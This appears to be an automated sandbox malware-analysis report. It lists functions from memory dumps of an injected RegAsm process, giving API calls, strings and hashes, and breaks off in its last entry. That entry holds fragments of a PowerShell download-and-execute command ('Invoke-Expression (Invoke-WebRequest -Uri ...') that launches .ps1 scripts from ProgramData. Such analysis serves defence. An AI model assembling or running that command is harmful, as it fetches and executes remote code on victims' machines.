Function 00412870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 142stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block,00000000,?,0041826A), ref: 004128A8
ExitProcess.KERNEL32 ref: 004128B3
strtok_s.MSVCRT ref: 004128CA

Strings

block, xrefs: 00412893

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 3b485f1632f083769998979d87b02b748d3d8af068dba69865fe3c31359cfa10
Instruction ID: ae6e9dac41f5a43a3b2df2dea02a57a44f9796bfde1c63c592e4e2a6fe63bb36
Opcode Fuzzy Hash: 3b485f1632f083769998979d87b02b748d3d8af068dba69865fe3c31359cfa10
Instruction Fuzzy Hash: F141E6B1B50342ABDB509F799D04ADB7BA9BF05B04F60062FF502D3684EABC94909B58

Uniqueness

Uniqueness Score: -1.00%

Function 1C2D9980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C2D9A35, 1C2D9D90
misuse, xrefs: 1C2D9A3F, 1C2D9D9A
SELECT %s, xrefs: 1C2D99B1
%s at line %d of [%.10s], xrefs: 1C2D9A44, 1C2D9D9F
no such function: %s, xrefs: 1C2D9E8C
API called with NULL prepared statement, xrefs: 1C2D9A04
API called with finalized prepared statement, xrefs: 1C2D9A19, 1C2D9D84

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
API String ID: 0-3900766660
Opcode ID: f3f0b7490a295a3b5ee8bd7830f0aa222a0a5bfa4010113b05c9aa4e95f212ce
Instruction ID: 2cb7c4a2225aa861463fc748283b978725c328fefca3a1bf64aff35c2842cbc1
Opcode Fuzzy Hash: f3f0b7490a295a3b5ee8bd7830f0aa222a0a5bfa4010113b05c9aa4e95f212ce
Instruction Fuzzy Hash: 21E108B47047829BD710EF25DC40BA777E6AF98315F12052DF88997241EB35E809CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00413A80 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 210stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413AB3
memset.MSVCRT ref: 00413AC5

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(?,00000000), ref: 00413AF1
lstrcat.KERNEL32(?,015720C0), ref: 00413B10
lstrcat.KERNEL32(?,?), ref: 00413B24
lstrcat.KERNEL32(?,01571F70), ref: 00413B38

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Part of subcall function 0040CF50: StrStrA.SHLWAPI(00000000,01572198,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB
Part of subcall function 0040CF50: memcmp.MSVCRT ref: 0040CFF9

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 004119B0: GlobalAlloc.KERNEL32(00000000,00413BC9,00000000,?,?,00413BC9,?,?), ref: 004119BB

StrStrA.SHLWAPI(00000000,015724F8), ref: 00413BD5
GlobalFree.KERNEL32(00000000), ref: 00413CAA

Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
Part of subcall function 00406F10: LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
Part of subcall function 00406F10: LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C

Part of subcall function 004070D0: memcmp.MSVCRT ref: 0040710B
Part of subcall function 004070D0: memset.MSVCRT ref: 00407139
Part of subcall function 004070D0: LocalAlloc.KERNEL32(00000040,?), ref: 00407170

lstrcat.KERNEL32(?,00000000), ref: 00413C4E
StrCmpCA.SHLWAPI(?,00428367,?,?,?,?,000003E8), ref: 00413C6B
lstrcat.KERNEL32(?,?), ref: 00413C86
lstrcat.KERNEL32(?,004286E0), ref: 00413C92

Strings

tA, xrefs: 00413CE4, 00413BF9, 00413C78, 00413BFD, 00413C7B, 00413CE7
tA, xrefs: 00413D14, 00413B66, 00413B6E

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID: tA$tA
API String ID: 4228189460-660347137
Opcode ID: a686527ce75510f47c60ae33d292261ed302ce260e08debc89d5b7b65b7bb98b
Instruction ID: dee6d321855fcd0dcb4b30ed1074f5a9a8d64092eff38df03ecb134e2f941785
Opcode Fuzzy Hash: a686527ce75510f47c60ae33d292261ed302ce260e08debc89d5b7b65b7bb98b
Instruction Fuzzy Hash: 5C71BBB5D00209ABCB10EFA1CC85EEE7779AF58304F10455EF615B3181EB789B48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1C293800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C293930
misuse, xrefs: 1C29393A
%s at line %d of [%.10s], xrefs: 1C29393F
integer, xrefs: 1C29389A
cannot open value of type %s, xrefs: 1C2938ED
null, xrefs: 1C2938E7
no such rowid: %lld, xrefs: 1C2939F8
real, xrefs: 1C293895, 1C2938EC
API called with finalized prepared statement, xrefs: 1C293924

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
API String ID: 0-1477268580
Opcode ID: 2f1aa597942b597a5e61f8d90586a311cd7e6b2498f5b5fefd2ee638866f0c8f
Instruction ID: ff66b2da5cdc6013350597f59ad034eb3242ae57bef6c28c710e11ab3831da6f
Opcode Fuzzy Hash: 2f1aa597942b597a5e61f8d90586a311cd7e6b2498f5b5fefd2ee638866f0c8f
Instruction Fuzzy Hash: F451FFB56043129FE710CF28DC80A96B3E4FF84719F144A2DF9568BB41D771E8188BB6

Uniqueness

Uniqueness Score: -1.00%

Function 00409840 Relevance: 24.2, APIs: 19, Instructions: 436stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,0156F1F0,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409A72
HeapAlloc.KERNEL32(00000000), ref: 00409A79
lstrcat.KERNEL32(000000FF,00000000), ref: 00409BBF
lstrcat.KERNEL32(000000FF,00427C8C), ref: 00409BCE
lstrcat.KERNEL32(000000FF,00000000), ref: 00409BE1
lstrcat.KERNEL32(000000FF,00427C90), ref: 00409BF0
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C03
lstrcat.KERNEL32(000000FF,00427C94), ref: 00409C12
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C25
lstrcat.KERNEL32(000000FF,00427C98), ref: 00409C34
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C47
lstrcat.KERNEL32(000000FF,00427C9C), ref: 00409C56
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C69
lstrcat.KERNEL32(000000FF,00427CA0), ref: 00409C78
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C8B
lstrcat.KERNEL32(000000FF,00427CA4), ref: 00409C9A
lstrlen.KERNEL32(000000FF), ref: 00409D10
lstrlen.KERNEL32(000000FF), ref: 00409D1F
memset.MSVCRT ref: 00409D78

Part of subcall function 004100F0: StrCmpCA.SHLWAPI(?,00000000,?,00407516,0156F720,?,00000000,?), ref: 004100FA

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$Heap$AllocProcessSystemTimememset
String ID:
API String ID: 248793818-0
Opcode ID: 60424cdee91f9c7364228ba8d33b6472c6ecfcb8414703a912abd327d43f9af3
Instruction ID: e4c0f5946711812f302e6db09ae3c8add09daf9cf66fbe5071595f1d653c5d4b
Opcode Fuzzy Hash: 60424cdee91f9c7364228ba8d33b6472c6ecfcb8414703a912abd327d43f9af3
Instruction Fuzzy Hash: 8D028271800149EBCB14EBE5DC55BEEBB79AF19304F10816EF906B3182DE786A48CB75

Uniqueness

Uniqueness Score: -1.00%

Function 1C263420 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 392COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C263548, 1C263594
misuse, xrefs: 1C263552, 1C26359E
%s at line %d of [%.10s], xrefs: 1C263557, 1C2635A3
ATTACH x AS %Q, xrefs: 1C26346F
API called with NULL prepared statement, xrefs: 1C263517
API called with finalized prepared statement, xrefs: 1C26352C, 1C263588

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-2988319395
Opcode ID: 567c76a6a077986df54ddf6376a31db5b063b81488478c2a9db69411d0ecb5ff
Instruction ID: 98c44f9e83a83c50584d0a591aabce4073837a0521f89ecca46275c9d243c41a
Opcode Fuzzy Hash: 567c76a6a077986df54ddf6376a31db5b063b81488478c2a9db69411d0ecb5ff
Instruction Fuzzy Hash: 82D1C2B0A043629BE7108F258C85B97B7F4BF58B14F204628FD4997742E735E588CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 1C3E7C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

winFullPathname1, xrefs: 1C3E7CC9
%s%c%s, xrefs: 1C3E7C7A
winFullPathname2, xrefs: 1C3E7D35

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%c%s$winFullPathname1$winFullPathname2
API String ID: 0-2846052723
Opcode ID: f1783311f62a2826b41e17c9edfa08ea3809b87de75cc0a9b9558b3270b06af1
Instruction ID: 8a94020a685338502a19a5e8a3e501e27cb139296446eec3ab6d23e84e963e7e
Opcode Fuzzy Hash: f1783311f62a2826b41e17c9edfa08ea3809b87de75cc0a9b9558b3270b06af1
Instruction Fuzzy Hash: 8841ADA1B093712BF322AA21BC41FE737AD9F47620F15032CF48A55181D613E84ACB73

Uniqueness

Uniqueness Score: -1.00%

Function 1C305470 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

JSON cannot hold BLOB values, xrefs: 1C305697
%!0.15g, xrefs: 1C3054D2
%lld, xrefs: 1C30550D

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$%lld$JSON cannot hold BLOB values
API String ID: 0-1047910854
Opcode ID: 6c2ef5baa1de8e34d8ccb1b98c1fe1091fbaf1f044010620f4539de432373a3b
Instruction ID: b58d1221106e07a9be01ef4fcc69e025ffa8ee9eb6fd1f5cdb6d21f519ed43d2
Opcode Fuzzy Hash: 6c2ef5baa1de8e34d8ccb1b98c1fe1091fbaf1f044010620f4539de432373a3b
Instruction Fuzzy Hash: 9551BE7B5052006BE3205A58DC41FFB376ADF82324F24034DF546572C2EB67B5698ABA

Uniqueness

Uniqueness Score: -1.00%

Function 00417458 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 127stringfileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
wsprintfA.USER32 ref: 004174A0

Part of subcall function 00413A80: memset.MSVCRT ref: 00413AB3
Part of subcall function 00413A80: memset.MSVCRT ref: 00413AC5
Part of subcall function 00413A80: lstrcat.KERNEL32(?,00000000), ref: 00413AF1
Part of subcall function 00413A80: lstrcat.KERNEL32(?,015720C0), ref: 00413B10
Part of subcall function 00413A80: lstrcat.KERNEL32(?,?), ref: 00413B24
Part of subcall function 00413A80: lstrcat.KERNEL32(?,01571F70), ref: 00413B38

FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
FindClose.KERNEL32(00000000), ref: 00417507
lstrcat.KERNEL32(?,0156F900), ref: 0041752B
lstrcat.KERNEL32(?,01571858), ref: 0041753F
lstrlen.KERNEL32(000000FF), ref: 00417549
lstrlen.KERNEL32(000000FF), ref: 00417557

Strings

%s\%s, xrefs: 0041749A
pwA, xrefs: 00417579, 004174C2, 004174CA, 00417581

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Findlstrlenmemset$CloseFileNextwsprintf
String ID: %s\%s$pwA
API String ID: 3642149608-466749030
Opcode ID: 875d51b01d3a38dba38f2ac80e5ce4861643c7340cf1d41c11cdd83305f67ae8
Instruction ID: 2e90e08b6375851233fbc302e69b98981367c3422ce142ffed233beea235272d
Opcode Fuzzy Hash: 875d51b01d3a38dba38f2ac80e5ce4861643c7340cf1d41c11cdd83305f67ae8
Instruction Fuzzy Hash: 7941BFB5900209ABCB14EFA0CC45FEE7779BF49704F40459EF605A3191DB78AB88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417456 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 126stringfileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
wsprintfA.USER32 ref: 004174A0

Part of subcall function 00413A80: memset.MSVCRT ref: 00413AB3
Part of subcall function 00413A80: memset.MSVCRT ref: 00413AC5
Part of subcall function 00413A80: lstrcat.KERNEL32(?,00000000), ref: 00413AF1
Part of subcall function 00413A80: lstrcat.KERNEL32(?,015720C0), ref: 00413B10
Part of subcall function 00413A80: lstrcat.KERNEL32(?,?), ref: 00413B24
Part of subcall function 00413A80: lstrcat.KERNEL32(?,01571F70), ref: 00413B38

FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
FindClose.KERNEL32(00000000), ref: 00417507
lstrcat.KERNEL32(?,0156F900), ref: 0041752B
lstrcat.KERNEL32(?,01571858), ref: 0041753F
lstrlen.KERNEL32(000000FF), ref: 00417549
lstrlen.KERNEL32(000000FF), ref: 00417557

Strings

%s\%s, xrefs: 0041749A
pwA, xrefs: 00417579, 004174C2, 004174CA, 00417581

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Findlstrlenmemset$CloseFileNextwsprintf
String ID: %s\%s$pwA
API String ID: 3642149608-466749030
Opcode ID: ad0fc3c1fb2e1b9641804281d39e155f99d710fd063f0faf182d5bb4228e525a
Instruction ID: 924de8276c418feef4113d708d31dfcabf1e1a37831f06c86973242481a33fa5
Opcode Fuzzy Hash: ad0fc3c1fb2e1b9641804281d39e155f99d710fd063f0faf182d5bb4228e525a
Instruction Fuzzy Hash: 2941BEB5900209ABCB10EBA0CC45FEE7779AF49704F40459EF605A3191DB78AB88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004134B0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 330COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,0156F1F0,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

ShellExecuteEx.SHELL32(0000003C), ref: 0041388D

Strings

" -UseBasicParsing).Content, xrefs: 004135E3
"" , xrefs: 00413716
*.ps1, xrefs: 0041350B
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00413627
C:\ProgramData\, xrefs: 0041352A
Invoke-Expression (Invoke-WebRequest -Uri ", xrefs: 004135BF
.ps1, xrefs: 00413596
C:\ProgramData\, xrefs: 00413655
<, xrefs: 00413845

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

